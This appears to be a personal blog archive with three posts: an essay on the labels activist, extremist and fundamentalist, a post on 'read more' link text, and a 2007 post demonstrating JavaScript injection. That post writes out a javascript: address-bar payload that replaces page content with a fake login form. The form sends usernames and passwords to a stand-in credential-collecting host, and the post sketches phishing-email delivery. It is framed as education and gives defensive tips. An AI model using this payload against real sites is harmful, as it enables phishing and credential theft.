Showing posts with label pet peeve. Show all posts

Sunday, August 23, 2009

Activist vs Extremist

“Well, she is an environmental activist,” or “He's a political extremist!”

We've all heard this, one way or another. These terms get word-smithed into various conversations as tiny little golden nuggets or strategically placed verbiage bombs of analysis to persuade the listener. I recall a day when these nouns had real meaning, but today they are generalized into social stereotypes.

Another such term was “fundamentalist,” used specifically and most commonly along with a reference to someone involved with organized religion. But to be a fundamentalist you had to earn it. You didn't just “think” a certain way, you had to act out in a certain detrimental manner. “Religious fundamentalists” were blowing themselves up or taking an entire 747 hostage.

Today these terms mean only one thing: you get involved with a goal of affecting some kind of outcome. The only other differentiating factor is whether the person performing the analysis views that involvement positively or negatively. For example, imagine someone who advocates for the environment. If they picket dirty businesses, advocate frequently for public recycling, or attempt to get people to sign petitions, then “well, she is an environmental activist.” The key is that you believe a certain thing and then that you try to have an influence on the world around you. But activist isn't a dirty word. It just seems to mean “involved” but in a way that the person doing the analysis prefers.

Now let's look at the other side. If someone is involved in wanting to influence the world around them toward their values but the person doing the analysis of their behavior doesn't like what they are doing, then you simply change the noun from “activist” to “extremist.”

Let's go back to the environmentalist. Take them off the picket line and simply have them sign a petition to require all city management to recycle. They value the environment and they are taking action via their signature. But if people don't like that petition they just cast it as a “petition put forth by environmental extremists,” and suddenly it gets the right negative spin. In this scenario, “extremist” is basically reduced to meaning “I don't like your cause because I don't share your perspective and I will call it extreme because you are getting involved but not in ways that I support.”

Back to “fundamentalist.” The greatest abuse of word-smithing seems to happen around this generalized label. According to the free dictionary the term is defined as (1) a religious group, (2) adhering to fundamental core beliefs, (3) who are intolerant of other perspectives, and (4) who are militant (historically). But that definition is changing. Today people get called “fundamentalists” for simply promoting a piece of legislation. In fact, to judge something as “not tolerant” is a pretty subjective act in reality. For example, let's remove militant and religious from the definition altogether and see how this term could be applied under a looser definition like what we experience today.

Let's go back to the environmentalist. They want a bill that requires city management offices to recycle. In that law they in fact want to require that recycling be mandated. So, any law like this qualifies as “intolerant” because it makes no room for alternative perspectives on recycling. By definition only one perspective wins and it would be called "a law" and laws have a funny way of not tolerating being broken. Next the proposition of recycling would be considered adherence to a core environmental protective belief. It isn't a loose definition. It is a core belief that drives one to feel that to protect the environment we need to save it from ourselves.

(Before I go on, I want you to understand that I am not advocating against recycling. It is just an analysis of terms here. Please stick with me. We are almost there.)

So by examining any effort to move a belief into law we could well define the advocates of that belief as “fundamentalist.” Suddenly the term gets smothered to nothing and what was an “environmental activist” has moved to “environmental extremist” or worse yet “environmental fundamentalist.” But these are just words.

Crazy as it may seem I think it is time to rethink our dialog. It is one thing to examine history and talk about our values and align ourselves with belief systems or liken one thing to another thing to more clearly understand it. But these terms are just labels meant to influence how you feel about the person or the associated defining adjective...

education advocate, animal rights activist, political extremist, religious fundamentalist, etc.

The more obvious attempts at influencing you come in their one-two combination as they sandwich the adjective...

extreme left-wing fundamentalist

So the next time you get into a conversation and someone starts talking about an activist, extremist or fundamentalist, don't assume you know what they mean. Maybe they are imagining the old definition of fundamentalist, and you might want to ask a refining question. For heaven's sake, don't get sucked into the buzzword war...

Those crazy neo-environmental fundamentalists are trying to get my office to recycle.

You reply, “Did they hijack your garbage can again?”

Your friend ponders your question, "Ah, no, but they are trying to create a rule about recycling."

In an effort to cool his jets you offer an equally silly buzzword-laden reply, "Those fascist totalitarianists should keep their garbage-management-values to themselves and let us LIVE OUR LIVES!!!"

Friday, April 20, 2007

Hack My Web Site (using JavaScript Injection)

Wow. I like to keep myself educated on how people are hacking stuff so I can build secure solutions, but I may have bumped into a hack that is pretty darned smart and takes a bit of a techy to at least detect. Many of you may have heard about SQL injection, where you put SQL queries into an input box and the standard errors end up coming back telling you more information than you should get to know about the database behind a web site. Well, this blog article is about how to take over part of a web site and spoof parts of the page using a technique called JavaScript injection. I will show you how it works, the likely way it will be implemented and how to watch for it.

To start: How it works. First off, understand this is an internet browser hack, and not a web site hack, so unless developers of internet browsers change how stuff works today, this technique should work going forward, despite what people do on their site to dodge this. Understand that what I am about to tell you is educational, with the hope that you educate friends and family about how this works so they can avoid being attacked.

IF YOU DO ANY OF THIS, YOU COULD GET ARRESTED BECAUSE YOU WOULD BE BREAKING THE LAW.

So, now, on with it. We are going to hack my web site: http://enginpost.com so pop another browser window and load that URL.

Most modern browsers give you the ability to enter javascript in the address bar for testing purposes. This inherent weakness is what we are about to exploit.

Here we go:
  1. Click on my resume and notice where the content goes to on the webpage. If you were to examine the HTML under the page you would see that the content is being Fjaxed (like Ajax, but better) into the DIV with the ID "FlashJxContent." You can quickly view the content of whatever is currently in that DIV by pasting the following code into your browser's address bar:

    javascript: alert(document.getElementById('FlashJxContent').innerHTML)
  2. That should show you the HTML inside the DIV. Now let's imagine my website was secure and people would come to it to log in. I am a nasty human being and I want to harvest people's login usernames and passwords. So what I want to do is create a fake form to gather this information and submit the details to a page on another website (where I gather the info and save it to my little database). Since we know how to read the innerHTML of a DIV, we should be able to write to it as well.
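  3. I want to get a fake form into the DIV where the HTML looks something like:

    <form action='http:www.SomeTemporarySite.com/steal_logins.asp' method='get'>
      Enter Username: <input id='UID' type='text'><BR />
      Enter Password: <input id='PWD' type='password'>
      <input type='submit' value='Login'>
    </form>

    Notice that the form submits the results to another website. Horrible, right?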
  4. To get this form into an existing webpage, paste the following javascript into the URL:

    javascript:void(document.getElementById('FlashJxContent').innerHTML = " <form action='http:www.SomeTemporarySite.com/steal_logins.asp' method='get'> Enter Username: <input id='UID' type='text'><BR /> Enter Password: <input id='PWD' type='password'> <input type='submit' value='Login'> </form>")

Wow, huh? Notice that the title in the address bar shows that we are on the same site, even though the URL is a little weird (but then again, how many users really understand what is going on in a URL?) If you wanted to change a few more areas of the page, the bad dude only has to add a semicolon after the double-quote and before the end parenthesis to add another line of JavaScript and write to another DIV at the same time.

HOW would this likely be implemented?

I hate to write this part because people could use this like instructions, so I won't go into a ton of specific detail, but basically...

If someone sent out an email saying you need to go to your account and fix something at your bank, the link could say "login to your bank" in your HTML-enabled email, but really point to that nasty website. The page that loads could say "loading Your Community Bank secure login..." and pop another window that hides the address bar. This window would really load your bank's website. Then a few seconds later the original page would load the JavaScript into the location on that other popped page (I have not tested this, but I think it would work, since we opened the page to begin with). At that point you would be on your bank's website but filling out a form that really has nothing to do with your website.

HOW do you guard family and friends against this?

  1. Tell them not to fill out web forms that don't show the address in the address bar of the browser. If the URL seems funny, don't use the form.
  2. Watch for the address to where the form submits. If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website (in the above example.) The average Joe may not be aware of this and it may seem a little techy a thing to do, but these days, that may yet be required.

Other than that, there isn't much more we can do to protect ourselves from this hack.
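The second check above, looking at where a form submits, can be automated. The following is an added example, not code from the original post: it scans a page's HTML and reports any form that contains a password field but submits to a different origin than the page. The sample page URL, the sample HTML and the `collector.example` host are constructed; `FlashJxContent` is the DIV named in the post.

```javascript
// Added example (not from the original post): report forms that collect a
// password but submit to an origin other than the page's own.
// SAMPLE_PAGE, SAMPLE_HTML and collector.example are constructed test data.
const SAMPLE_PAGE = "https://bank.example/account";
const SAMPLE_HTML = `
  <form action="/login" method="post">
    <input name="uid" type="text"><input name="pwd" type="password">
  </form>
  <form action="https://search.example/q"><input name="q" type="text"></form>
  <div id="FlashJxContent">
    <form action='https://collector.example/submit' method='get'>
      <input id='UID' type='text'><input id='PWD' type='password'>
    </form>
  </div>`;

function auditForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  const actionRe = /(?:^|\s)action\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  const passwordRe = /<input\b[^>]*\stype\s*=\s*["']?password\b/i;
  let match;
  while ((match = formRe.exec(html)) !== null) {
    const [, attrs, body] = match;
    if (!passwordRe.test(body)) continue; // only credential forms matter here
    const a = actionRe.exec(attrs);
    // A missing or empty action submits to the page's own URL.
    const action = a ? (a[1] ?? a[2] ?? a[3]) : "";
    let targetOrigin;
    try {
      // Resolve relative actions the way the browser would.
      targetOrigin = new URL(action, pageUrl).origin;
    } catch {
      targetOrigin = "unparseable";
    }
    if (targetOrigin !== pageOrigin) {
      findings.push({ action, targetOrigin, pageOrigin });
    }
  }
  return findings;
}

console.log(auditForms(SAMPLE_HTML, SAMPLE_PAGE));
```

In a browser, the same comparison can be made on live elements by checking the `action` of each entry in `document.forms` against `location.origin`.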

Thursday, April 5, 2007

Click To Read More

Here is a pet peeve of mine. Sites, in an effort to appear usable, put the same consistent link at the bottom of each of the content hints on their site’s landing page: “read more.” The idea simply is that you are giving them a reasonable sample of what the content consists of, and if they want to read the entire piece then they need to click that fancy little link to “read more.” Now, I am likely preaching to the choir here by even mentioning the next two points, but I consistently see people make this error. (At the end of the blog I recommend a new standard, so if you remain interested in why this is a problem, then read on.) Here are two very simple problems with the “read more” technique:

“read more” (or “Full Story” or “click here”) at a quick glance tells me nothing about what I am about to read more about. Assuming most people are buzzing your landing page, in search of (1) interesting content that they can (2) immediately click on, seeing “read more” just makes me slow down to read what was above it. The entire experience of “read more” kills the speed in terms of approachability, of people getting to your real content. The lesson here is that one should always link from meaningful text, not from simply verb ideas. Yes, you want them to “read more” but they want to read about something, not just more.

The number one indexed property of your website is your links. And what is, in fact, indexed then if you are too commonly using phrases like “read more”? Unless you are attempting to break some world record on getting the most hits for sites that are indexed around the key phrase “read more,” I recommend never using that as your link text again. If a piece of content in your site is about “hiking with relatives” then the link text should contain words like that, and not “read more.” When was the last time someone you knew hit Google or Yahoo and searched for the phrase “read more about hiking with relatives”?

Now, you can likely verbalize the recommendation I am about to make since it was embedded into both above points. When you create links to expanded content (and I highly recommend not putting content other than content highlights on landing pages, but that is another blog), link to the content using highly meaningful link text that you would prefer getting googled on and that is easy to read from a user’s perspective. So, as the final example, assume the last paragraph here is a content highlight with appropriate link text:

Florida housing sex offenders under bridge
The sparkling blue waters off Miami's Julia Tuttle Causeway look as if they were taken from a postcard. But the causeway's only inhabitants see little paradise in their surroundings. Five men -- all registered sex offenders convicted of abusing children -- live along the causeway because there is a housing shortage for Miami's least welcome residents.